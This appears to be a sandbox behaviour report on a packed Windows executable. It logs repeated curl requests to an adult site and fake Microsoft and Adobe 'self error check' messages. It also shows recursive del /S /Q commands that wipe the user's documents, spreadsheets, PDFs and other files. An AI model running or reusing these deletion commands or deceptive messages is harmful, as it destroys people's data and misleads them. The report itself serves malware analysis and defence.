Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: unknown unknown	Jump to behavior

Source: Z0hOr2pD7k.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe

Code function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00A528C0

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul	Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul	Jump to behavior
